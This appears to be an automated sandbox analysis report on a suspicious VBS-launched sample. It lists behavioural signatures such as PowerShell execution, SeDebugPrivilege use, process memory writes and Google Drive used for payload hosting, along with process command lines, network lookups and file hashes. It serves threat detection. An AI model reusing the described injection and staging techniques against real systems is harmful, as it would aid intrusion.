Analysis Overview
SHA256: 688671fcf92adabafc63e4833b50f9730bab3a3295848589c2720f0e34462225
Threat Level: Shows suspicious behavior
The file 24dac6b183fc5cb29533742b3e54f209.bin was found to show suspicious behavior.
Malicious Activity Summary
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-06-13 01:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-13 01:20
Reported: 2024-06-13 01:23
Platform: win7-20240508-en
Max time kernel: 144s
Max time network: 149s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1744 wrote to memory of 1976 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1976 wrote to memory of 2160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 1bdacc28017d2adeab8c40b68e30acfd |
| SHA1 | 94ac78a16d912649ddb9421ddf3017aed9556660 |
| SHA256 | 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744 |
| SHA512 | 409d19810ea569da7fdbf73d916958e39ac2853124b289217e3c9d7ebac9ce225ff954663938a381244d4f82b890ac0094f060ba8ac2e2882856f45f13d864ef |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-06-13 01:20
Reported: 2024-06-13 01:23
Platform: win10v2004-20240508-en
Max time kernel: 150s
Max time network: 151s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5068 wrote to memory of 4296 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4296 wrote to memory of 184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 714cb325c3d69ffdf652293ead3d50b1 |
| SHA1 | f79daa74b0ff2c765007c8b0e22a3bedb05ba5a6 |
| SHA256 | 641832d41890d7f88f0ebbbd45d1168bfdb199408820ee139e1f2c8d0b62587d |
| SHA512 | 816a67a4407ec8850ed9fa0dde87f5c5dd6959e68b378865a338f6253d1e0a9ff51dc63c85497491dafd29b53b96702e08c937017eb2ba6d3ea7bfffbe6da07a |
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 5791b2b2b17aa013def1da16dcbc8ab3 |
| SHA1 | 841fcae50ddd7f66b105744deae2d3424762ba1b |
| SHA256 | 3f153f741aa814f65701c4f2ad0d97a53049e30148a9a48437434fb6a971b38b |
| SHA512 | 82391bb1c6ea2b006982bce3da12e564afa965cc603e1ecac5b42ca02b44f768ded0f12979c4a6b5b926e333e53402b20cf7040f3042ead16e84d25714aca1fa |
C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt
| MD5 | 1bdacc28017d2adeab8c40b68e30acfd |
| SHA1 | 94ac78a16d912649ddb9421ddf3017aed9556660 |
| SHA256 | 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744 |
| SHA512 | 409d19810ea569da7fdbf73d916958e39ac2853124b289217e3c9d7ebac9ce225ff954663938a381244d4f82b890ac0094f060ba8ac2e2882856f45f13d864ef |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lyfjnhny.ldt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |